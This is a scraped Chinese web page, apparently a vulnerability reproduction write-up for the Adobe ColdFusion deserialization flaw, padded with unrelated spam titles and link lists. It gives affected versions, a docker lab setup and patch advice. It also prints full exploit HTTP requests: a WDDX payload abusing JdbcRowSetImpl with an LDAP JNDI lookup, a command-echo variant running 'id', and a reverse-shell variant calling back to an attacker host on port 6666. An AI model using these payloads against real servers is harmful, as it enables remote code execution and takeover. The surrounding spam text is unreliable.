当前位置: 首页 > news >正文

网站内容管理系统使用说明书南软科技网站开发

网站内容管理系统使用说明书,南软科技网站开发,东莞常平中学智慧校园应用中心,佛山外贸网站建设公司0x01 产品简介 Adobe ColdFusion是美国奥多比#xff08;Adobe#xff09;公司的一套快速应用程序开发平台。该平台包括集成开发环境和脚本语言。 0x02 漏洞概述 Adobe ColdFusion存在代码问题漏洞#xff0c;该漏洞源于受到不受信任数据反序列化漏洞的影响#xff0c;攻击…0x01 产品简介 Adobe ColdFusion是美国奥多比Adobe公司的一套快速应用程序开发平台。该平台包括集成开发环境和脚本语言。 0x02 漏洞概述 Adobe ColdFusion存在代码问题漏洞该漏洞源于受到不受信任数据反序列化漏洞的影响攻击者通过漏洞可以代码执行可导致服务器失陷获取服务器权限。 0x03 影响范围 ColdFusion 2018 Update 16  ColdFusion 2021 Update 6  ColdFusion 2023 GA Release (2023.0.0.330468) 0x04 复现环境 docker搭建ColdFusion 2023.0.0.330468漏洞环境 拉取镜像 docker pull vulfocus/vcpe-1.0-a-adobe-coldfusion:2023.0.0.330468-openjdk-release 启动环境 docker run -d -P vulfocus/vcpe-1.0-a-adobe-coldfusion:2023.0.0.330468-openjdk-release PS:需确认8080对应的端口 验证是否可访问环境 0x05 漏洞复现 exp POST /CFIDE/adminapi/base.cfc?method HTTP/1.1 Host: your-ip User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 Accept: text/html,application/xhtmlxml,application/xml;q0.9,image/avif,image/webp,*/*;q0.8 Accept-Language: zh-CN,zh;q0.8,zh-TW;q0.7,zh-HK;q0.5,en-US;q0.3,en;q0.2 Accept-Encoding: gzip, deflate Connection: close Content-Type: application/x-www-form-urlencoded cmd: idargumentCollection wddxPacket version1.0header/datastruct typexcom.sun.rowset.JdbcRowSetImplxvar namedataSourceNamestringldap://your-ip:1389/Basic/TomcatEcho/string/varvar nameautoCommitboolean valuetrue//var/struct/data /wddxPacket PS本次复现需要使用jndi漏洞利用工具JNDIExploit-1.4-SNAPSHOT.jar TomcatEcho回显链 开启监听 反弹shell 利用链 POST /CFIDE/adminapi/base.cfc?method HTTP/1.1 Host: your-ip User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 Accept: text/html,application/xhtmlxml,application/xml;q0.9,image/avif,image/webp,*/*;q0.8 Accept-Language: zh-CN,zh;q0.8,zh-TW;q0.7,zh-HK;q0.5,en-US;q0.3,en;q0.2 Accept-Encoding: gzip, deflate Connection: close Content-Type: application/x-www-form-urlencodedargumentCollection wddxPacket version1.0header/datastruct typexcom.sun.rowset.JdbcRowSetImplxvar namedataSourceNamestringldap://vpsip:1389/Basic/ReverseShell/vpsip/6666/string/varvar nameautoCommitboolean valuetrue//var/struct/data /wddxPacket 0x06 修复建议 根据影响版本中的信息建议相关用户尽快更新至安全版本 ColdFusion 2018 Update 17 ColdFusion 2021 Update 7 ColdFusion 2023 Update 1 下载链接请参考 https://helpx.adobe.com/security/products/coldfusion/apsb23-40.html
http://www.w-s-a.com/news/851781/

相关文章:

  • 网站建设优化服务机构苏州市做网站
  • 网站如何优化流程企业网站管理系统视频教程
  • 我想克隆个网站 怎么做贵州住房和城乡建设厅官网
  • 网站建设项目前景上海今天新闻综合频道
  • 做网站推销的如何谈客户wordpress怎么做商城
  • 摄影素材库网站服装页面设计的网站
  • 如何用国外网站做头条做个游戏app的费用大概多少
  • 网站 形象入口页福州网站建设网络公司排名
  • 免费下载教学设计的网站送网站建设管理信息内容审核制度
  • 外贸专业网站的公司百度旗下13个app
  • 物理组简介 网站建设高师院校语言类课程体系改革与建设 教学成果奖申报网站
  • 爱网站无法登录怎么回事手表网
  • 网站建设公司现在还挣钱吗山西手动网站建设推荐平台
  • 重庆建设工程交易信息网站网站制作公司起名
  • 东莞寮步做网站的有吗企业宣传册制作
  • 做网站的软件是哪个上蔡做网站
  • 前后端分离实现网站开发紧急通知网页升级
  • 河北专业网站建设公司推荐佛山小程序开发平台
  • 网站开发强制开启浏览器极速模式建设网站有什么风险
  • 360全景网站建设常州专业网站建设公司咨询
  • 重庆大渡口网站建设网站增加一体化建设功能的好处
  • 网站开发完整视频网站上传 404
  • 自适应网站做推广北京建设工程招标网
  • 外贸网站设计注意事项网上商城官网入口
  • 正规的营销型网站建设公司微官网是网站吗
  • 南京行业门户网站无锡阿里巴巴做网站
  • 河北省和城乡住房建设厅网站wamp wordpress打不开
  • 在哪个平台做网站比较好自动app优化
  • 有没有能帮人快速网站备案的机构个人学做网站
  • 凌云县 城市建设 网站西安市建网站